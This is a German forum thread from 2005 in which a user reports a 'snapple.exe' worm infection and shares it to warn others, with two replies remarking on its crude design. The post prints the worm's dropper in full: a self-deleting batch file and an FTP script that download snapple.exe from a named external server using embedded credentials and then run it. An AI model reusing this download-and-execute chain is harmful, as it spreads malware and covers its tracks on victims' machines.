Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

Trojaner "snapple.exe"

Frage Microsoft

Mitglied: Haggi

Haggi (Level 1) - Jetzt verbinden

10.05.2005, aktualisiert 11.05.2005, 6199 Aufrufe, 2 Kommentare

Hi, alle Viren-Wurm- und Troj.- Geplagten,

habe mir vor ein paar Tagen wegen einer kurzzeitig ausgeschalteten Firewall den "snapple.exe alias syshost.exe"-Wurm eingefangen. Zum Glück hat mein Virenscanner eine Verbreitung auf dem Rechner verhindern können. ABER interessant ist eine batch-Datei im Windows-Ordner, mit der dieses Teil immer wieder geladen werden könnte. Ich gebe sie hier mit der Kommandoerweiterung wieder:

1.bat

@echo off
ftp -n -v -s:.a
snapple.exe
del .a
del /F 1.bat
exit /y

.a

open wowvill.easydns.us 5192
user tr lo.max
binary
GET snapple.exe
bye

Damit wird snapple eingeschleust und gestartet. Da mein Virenscanner den Aufruf snapple.exe gestoppt hatte, haben die Löschbefehle nicht mehr gewirkt.

Also evtl. auch ähnliche Dateien suchen, wenn ein Schädling immer wieder kommt.
Ich habe meine Firewall jedenfalls für den o.g. Server (wowvill....) dicht gemacht.

Gute PC-Gesundheit.

Haggi
Mitglied: fritzo
10.05.2005 um 23:10 Uhr
scheint wohl von Anfängern geschrieben worden zu sein, das Teil. Ein Batchfile als Trigger und Vermehrungsroutine, interessant *grins*
Bitte warten ..
Mitglied: meto
11.05.2005 um 07:13 Uhr
Das sehe ich ähnlich. Wenn es einem so leicht gemacht wird, ist man als Admin immer sehr dankbar.
Bitte warten ..
Neuester Wissensbeitrag
DSL, VDSL

Telekom blockiert immer noch den Port 7547 in ihrem Netz

(3)

Erfahrungsbericht von joachim57 zum Thema DSL, VDSL ...

Heiß diskutierte Inhalte
Windows Userverwaltung
Ausgeschiedene Mitarbeiter im Unternehmen - was tun mit den AD Konten? (34)

Frage von patz223 zum Thema Windows Userverwaltung ...

LAN, WAN, Wireless
gelöst Server erkennt Client nicht wenn er ausserhalb des DHCP Pools liegt (28)

Frage von Mar-west zum Thema LAN, WAN, Wireless ...

LAN, WAN, Wireless
FritzBox, zwei Server, verschiedene Netze (21)

Frage von DavidGl zum Thema LAN, WAN, Wireless ...

Viren und Trojaner
Aufgepasst: Neue Ransomware Goldeneye verbreitet sich rasant (20)

Link von Penny.Cilin zum Thema Viren und Trojaner ...